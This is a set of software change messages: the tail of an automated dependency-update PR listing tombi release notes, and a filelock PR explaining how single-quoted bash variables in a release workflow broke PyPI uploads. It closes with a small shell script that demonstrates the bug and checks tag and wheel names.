- [@​zanieb](https://redirect.github.com/zanieb)
- [@​AlexWaygood](https://redirect.github.com/AlexWaygood)
</details>
<details>
<summary>tombi-toml/tombi (tombi)</summary>
### [`v0.10.2`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.10.2)
[Compare Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.10.1...v0.10.2)
<!-- Release notes generated using configuration in .github/release.yml
at v0.10.2 -->
#### What's Changed
##### 🚀 New Features
- Add references support for Cargo and pyproject workspaces by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1821](https://redirect.github.com/tombi-toml/tombi/pull/1821)
##### 🐛 Bug Fixes
- fix(lsp): resolve type definitions for scalar bindings by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1820](https://redirect.github.com/tombi-toml/tombi/pull/1820)
- fix(vscode): allow spaced toml fences by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1816](https://redirect.github.com/tombi-toml/tombi/pull/1816)
##### 🛠️ Other Changes
- fix(pyproject): link build-system requires by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1822](https://redirect.github.com/tombi-toml/tombi/pull/1822)
- feat(vscode): add TOML configuration defaults by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1818](https://redirect.github.com/tombi-toml/tombi/pull/1818)
- Deprecate path declaration navigation in pyproject and cargo by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1823](https://redirect.github.com/tombi-toml/tombi/pull/1823)
- Improve docs tables and workspace goto navigation by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1825](https://redirect.github.com/tombi-toml/tombi/pull/1825)
**Full Changelog**:
<https://github.com/tombi-toml/tombi/compare/v0.10.1...v0.10.2>
### [`v0.10.1`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.10.1)
[Compare Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.10.0...v0.10.1)
<!-- Release notes generated using configuration in .github/release.yml
at v0.10.1 -->
#### What's Changed
##### 🚀 New Features
- Fix tombi config path resolution and completions by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1807](https://redirect.github.com/tombi-toml/tombi/pull/1807)
##### 🐛 Bug Fixes
- fix: keep root hover range on the current key-value by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1812](https://redirect.github.com/tombi-toml/tombi/pull/1812)
- fix(config): reject empty schema glob patterns by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1814](https://redirect.github.com/tombi-toml/tombi/pull/1814)
##### 🛠️ Other Changes
- Add schema exclude support by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1813](https://redirect.github.com/tombi-toml/tombi/pull/1813)
- docs: refine formatter intro wording by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1815](https://redirect.github.com/tombi-toml/tombi/pull/1815)
**Full Changelog**:
<https://github.com/tombi-toml/tombi/compare/v0.10.0...v0.10.1>
### [`v0.10.0`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.10.0)
[Compare Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.9.26...v0.10.0)
<!-- Release notes generated using configuration in .github/release.yml
at v0.10.0 -->
#### What's Changed
The file path specification in `.config/tombi.toml` has been modified to
be searched starting from its parent directory, rather than from
`.config/`.
##### 🚨 Breaking Changes
- fix: add leading comment handling for empty tables and arrays in
formatting by [@​ya7010](https://redirect.github.com/ya7010) in
[#​1800](https://redirect.github.com/tombi-toml/tombi/pull/1800)
- fix: resolve project-root paths from `.config/tombi.toml` config by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1802](https://redirect.github.com/tombi-toml/tombi/pull/1802)
##### 🐛 Bug Fixes
- fix: resolve schema paths from config base dir by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1806](https://redirect.github.com/tombi-toml/tombi/pull/1806)
##### 🛠️ Other Changes
- fix: remove redundant explanation for group-blank-lines-limit and
table-blank-lines by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1799](https://redirect.github.com/tombi-toml/tombi/pull/1799)
- Strengthen README overview by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1801](https://redirect.github.com/tombi-toml/tombi/pull/1801)
- docs: correct terminology for auto sorting in documentation by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1805](https://redirect.github.com/tombi-toml/tombi/pull/1805)
- ci: cache TOMBI_CACHE_HOME in CI by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1804](https://redirect.github.com/tombi-toml/tombi/pull/1804)
- Add schema catalog path examples by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1803](https://redirect.github.com/tombi-toml/tombi/pull/1803)
**Full Changelog**:
<https://github.com/tombi-toml/tombi/compare/v0.9.26...v0.10.0>
### [`v0.9.26`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.9.26)
[Compare Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.9.25...v0.9.26)
<!-- Release notes generated using configuration in .github/release.yml
at v0.9.26 -->
#### What's Changed
##### 🚀 New Features
- feat: add example paths for schema in JSON and Rust definitions by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1798](https://redirect.github.com/tombi-toml/tombi/pull/1798)
- feat(formatter): add blank line spacing options by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1792](https://redirect.github.com/tombi-toml/tombi/pull/1792)
##### 🐛 Bug Fixes
- fix(vscode): enable markdown TOML fence injection by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1794](https://redirect.github.com/tombi-toml/tombi/pull/1794)
- chore: update codeblock ru
> ✂ **Note**
>
> PR body was truncated to here.
</details>
---
### Configuration
📅 **Schedule**: (in timezone UTC)
- Branch creation
- "before 4am on monday"
- Automerge
- Between 12:00 AM and 03:59 AM, only on Monday (`* 0-3 * * 1`)
🚦 **Automerge**: Enabled.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.
---
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/ansible/molecule).
---------
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Rakesh S <rakesh.s552004@gmail.com>
Releases have been silently broken on PyPI since 3.26.0. Every dispatch of the release workflow since then produced a `filelock-X.Y.Z.devN+g<sha>-py3-none-any.whl`, which PyPI rejects with `400 Bad Request` because local version identifiers are not allowed on the public index. 🐛 PyPI still shows 3.25.2 as the latest version while GitHub has tags and releases for 3.26.0, 3.26.1, and 3.27.0. Anyone running `pip install filelock` is stuck on the last working release.

Commit 8cd6bd9 (🔒 ci(workflows): add zizmor security auditing #517) moved the release version from a GitHub Actions template expression into a bash environment variable to harden against template injection. The move was correct, but kept the existing single quotes around the reference: `git tag '${STEPS_V_OUTPUTS_VERSION}'`. In bash, single quotes suppress variable expansion, so `git tag` received the literal 28-character string `${STEPS_V_OUTPUTS_VERSION}` as the tag name. hatch-vcs then could not find a real version on `HEAD`, `uv build` fell back to the `.devN+g<sha>` scheme, and PyPI rejected the upload. Double quotes preserve the env-var indirection zizmor wanted while letting bash actually read the value, so the correct version gets tagged and the wheel is built with the clean `filelock-X.Y.Z-py3-none-any.whl` name PyPI expects.

Why this slipped past CI: the tag-creation step is gated behind `if: github.event.inputs.release != 'no'`, so regular push and pull-request events skip it entirely. The broken line only runs under manual workflow-dispatch, and even then the failure surfaces in the `release` job's PyPI-publish step, which no PR-level check watches. The last two successful CI builds of the release workflow were the ones that actually broke publishing.

The second commit aligns the `actions/upload-artifact` version comments with the exact tag the pinned hash resolves to (`v7.0.0` instead of `v7`). 🔒 Zizmor flags the mismatch as `ref-version-mismatch` because the moving major tag `v7` currently points to a different commit, and pre-commit would otherwise block this branch on its own audit. The pinned hash does not change, so there is no behavioral impact.

After merge, re-dispatch the release workflow with a `patch` bump (or whatever bump type makes sense) to get the currently-unpublished work onto PyPI.
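The quoting difference described above, reproduced in a stand-alone script together with two guards a release step could run before `git tag` and before upload. This is an added example, not code from the filelock PR or its workflow; only the env var name comes from the PR, and the sample version and wheel filenames are constructed.

```shell
#!/usr/bin/env sh
# Added example (not part of the filelock PR): show why single quotes
# produced a tag literally named ${STEPS_V_OUTPUTS_VERSION}, and what a
# release step can check so the problem fails in the tag step rather than
# in the PyPI publish log. Sample values below are constructed.

# GitHub Actions exports the step output into this env var before the
# script runs; the value is a constructed sample.
STEPS_V_OUTPUTS_VERSION="3.28.0"

# The pre-fix line: single quotes suppress expansion, so the tag name is
# the literal text "${STEPS_V_OUTPUTS_VERSION}".
broken_tag_name() {
    echo '${STEPS_V_OUTPUTS_VERSION}'
}

# The fixed line: double quotes keep the env-var indirection (no template
# expression inline) while letting the shell expand the variable.
fixed_tag_name() {
    echo "${STEPS_V_OUTPUTS_VERSION}"
}

# Guard before tagging: reject an empty name, any name that still carries
# an unexpanded reference, or anything that is not a plain X.Y.Z release.
is_valid_release_tag() {
    case "$1" in
        ''|*'$'*|*'{'*|*'}'*) return 1 ;;
    esac
    printf '%s\n' "$1" | grep -Eq '^[0-9]+\.[0-9]+\.[0-9]+$'
}

# Guard before upload: the VERSION field of NAME-VERSION-PYTAG-ABI-PLAT.whl
# must not contain a local identifier ("+g<sha>"), which PyPI rejects.
wheel_is_publishable() {
    wheel_version=$(printf '%s\n' "$1" | cut -d- -f2)
    case "$wheel_version" in
        ''|*+*) return 1 ;;
        *) return 0 ;;
    esac
}

# Stand-alone demo: run the tag guard over both quoting styles.
release_tag_check() {
    for tag in "$(broken_tag_name)" "$(fixed_tag_name)"; do
        if is_valid_release_tag "$tag"; then
            echo "ok:     would tag $tag"
        else
            echo "reject: '$tag' is not a release version"
        fi
    done
}

release_tag_check
```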